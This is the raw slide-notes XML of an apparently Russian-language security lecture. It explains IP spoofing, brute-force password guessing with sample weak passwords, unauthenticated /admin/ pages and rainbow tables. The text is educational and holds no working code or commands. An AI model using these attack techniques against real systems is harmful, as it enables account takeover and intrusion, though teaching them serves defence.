
<file path=ppt/notesSlides/_rels/notesSlide54.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide56.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide58.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide59.xml.rels><?xml version="1.0" encoding="UTF-8"?>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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide60.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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide62.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<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
</Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide63.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide63.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/>
</Relationship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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-спуфинг (от англ. spoof — мистификация) —</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Вид хакерской атаки, заключающийся в использовании чужого IP-адреса с целью обмана системы безопасности.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Метод, используемый в некоторых атаках. Состоит в проставлении в поле обратного (source) адреса IP-пакета неверного адреса. Применяется с целью сокрытия истинного адреса атакующего, с целью вызвать ответный пакет на нужный адрес и с иными целями.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Протокол транспортного (4) уровня TCP имеет встроенный механизм для предотвращения спуфинга — так называемые номера последовательности и подтверждения (sequence number, acknowledgement number). Протокол UDP не имеет такого механизма, следовательно, построенные на его основе приложения более уязвимы для спуфинга.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Аутентификация (Authentication)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Подбор (Brute Force): </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Многие системы позволяют использовать слабые пароли или ключи шифрования, и пользователи часто выбираю легко угадываемые или содержащиеся в словарях парольные фразы.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Используя эту ситуацию, злоумышленник может воспользоваться словарем и попытаться использовать тысячи или даже миллионы содержащихся в нем комбинаций символов в качестве пароля. Если испытуемый пароль позволяет получить доступ к системе, атака считается успешной и атакующий может использовать учетную запись.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Подобная техника проб и ошибок может быть использована для подбора ключей шифрования. В случае использования севером ключей недостаточной длины, злоумышленник может получить используемый ключ, протестировав все возможные комбинации.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Существует два вида подбора: прямой и обратный. При прямом подборе используются различные варианты пароля для одного имени пользователя. При обратном перебераются различные имена пользователей, а пароль остается неизменным. В системах с миллионами учетных записей вероятность использования различными пользователями одного пароля довольно высока. Не смотря на популярность и высокую эффективность, подбор может занимать несколько часов, дней или лет.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Имя пользователя = Jon</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пароли = smith, michael-jordan, [pet names], [birthdays], [car names], ...</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Имена пользователей = Jon, Dan, Ed, Sara, Barbara, .....</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пароль = 12345678</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Недостаточная аутентификация (Insufficient Authentication): </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>эта уязвимость возникает, когда Web-сервер позволяет атакующему получать доступ к важной информации или функциям сервера без должной аутентификации. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Пример</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Многие Web-приложения по умолчанию используют для административного доступа ссылку в корневой директории сервера (/admin/). Обычно  ссылка на эту страницу не фигурирует в содержимом сервера, однако страница доступна с помощью стандартного браузера. Поскольку пользователь или разработчик  предполагает, что никто не воспользуется этой страницей, так как ссылки на неё отсутствует, зачастую  реализацией аутентификации пренебрегают. И для получения контроля над сервером злоумышленнику достаточно зайти на эту страницу.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Другой пример – аутентификация по </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адресу. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адрес можно подменить.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Радужная таблица (англ. rainbow table) — специальный вариант таблиц поиска (англ. lookup table), использующий механизм разумного компромисса между временем поиска по таблице и занимаемой памятью (time-memory tradeoff). Радужные таблицы используются для вскрытия паролей, преобразованных при помощи необратимой хеш-функции, а также для атак на симметричные и асимметричные шифры на основе известного открытого текста.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="187"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Man-in-the-Middle - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="500" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>«человек посередине»</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="500" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
